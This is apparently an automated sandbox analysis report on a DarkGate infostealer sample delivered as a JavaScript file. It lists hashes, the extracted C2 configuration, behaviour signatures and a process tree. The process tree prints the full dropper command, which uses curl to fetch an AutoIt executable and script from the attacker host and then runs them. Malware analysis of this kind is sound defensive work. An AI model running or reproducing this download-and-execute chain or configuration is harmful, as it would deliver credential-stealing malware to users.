Analysis
-
max time kernel
171s -
max time network
177s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
-
submitted
19-10-2023 19:37
General
-
Target
Transition_Journey_2023_Confidential.js
-
Size
50KB
-
MD5
83914282d9c9680c567121cc18dac066
-
SHA1
f80092da919ee472ac673c96da20d28c96a30b27
-
SHA256
412a2790effdc2b85bb83bdf1106fe2f2471df8dfd81df07084ba31371aa8887
-
SHA512
0f8429f3a2a3c1d972d657c39bd5092395d9b108fbf08ead143daac720a637019222e0a61ed9fba35a9fc2f155c5b060d23ff77cadc31041eb2c5017a24f272b
-
SSDEEP
768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3TWpe5q:nAIMFFdYMxAcEQDK
Malware Config
Extracted
darkgate
Ricoc3
http://hgfdytrywq.com
-
alternative_c2_port
8080
-
anti_analysis
false
-
anti_debug
false
-
anti_vm
false
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_rawstub
true
-
crypto_key
uwCQCDKnhIZhrE
-
internal_mutex
txtMut
-
minimum_disk
100
-
minimum_ram
4096
-
ping_interval
4
-
rootkit
true
-
startup_persistence
true
-
username
Ricoc3
Signatures
-
DarkGate
DarkGate is an infostealer written in C++.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs
-
Blocklisted process makes network request 64 IoCs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Transition_Journey_2023_Confidential.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o nebsse.au3 http://hgfdytrywq.com:80/msieghqixob & Autoit3.exe nebsse.au32⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\system32\curl.execurl -o Autoit3.exe http://hgfdytrywq.com:803⤵
-
-
C:\Windows\system32\curl.execurl -o nebsse.au3 http://hgfdytrywq.com:80/msieghqixob3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Autoit3.exeAutoit3.exe nebsse.au33⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.14⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.14⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Drops startup file
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
166B
MD529ddce9df989e7d599836433960971ce
SHA19f52d8e03fe0c2af0a9ed403fbf78fccf8727537
SHA25652a993230d8eb7f793e93ebf664ecba01df2c21cf81412f6cd4a912a1dd69433
SHA512b58377131db2b099ea32771efea5634bf62ff295dd09c6c0de517757d7eb0c668ba000826939cf4c0c5baa9c51a51aa4a23569c97190594a4c7f28af44f28d64
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
485KB
MD5d53f05550211535178a23ba86edd7388
SHA168d2d61732e8c2b2ad875d1e2ad9f39f190914b4
SHA256bd7a4b0aa4d06dba3f8aa33277f016d018313ee09eee2696a565f60469ea589d
SHA512b00445bb380ed158907302ecc0b18e10194074f4c3dac83b139fbba47c243d60ea46e55d711c09200301e3cb447abe93ffe5997b3611fb811fb323f07949889d
-
Filesize
485KB
MD5d53f05550211535178a23ba86edd7388
SHA168d2d61732e8c2b2ad875d1e2ad9f39f190914b4
SHA256bd7a4b0aa4d06dba3f8aa33277f016d018313ee09eee2696a565f60469ea589d
SHA512b00445bb380ed158907302ecc0b18e10194074f4c3dac83b139fbba47c243d60ea46e55d711c09200301e3cb447abe93ffe5997b3611fb811fb323f07949889d
-
Filesize
4.0MB
-
Filesize
3.2MB
-
Filesize
4.0MB
-
Filesize
3.2MB
-
Filesize
3.2MB
-
Filesize
3.2MB
-
Filesize
3.2MB
-
Filesize
3.2MB
-
Filesize
3.2MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB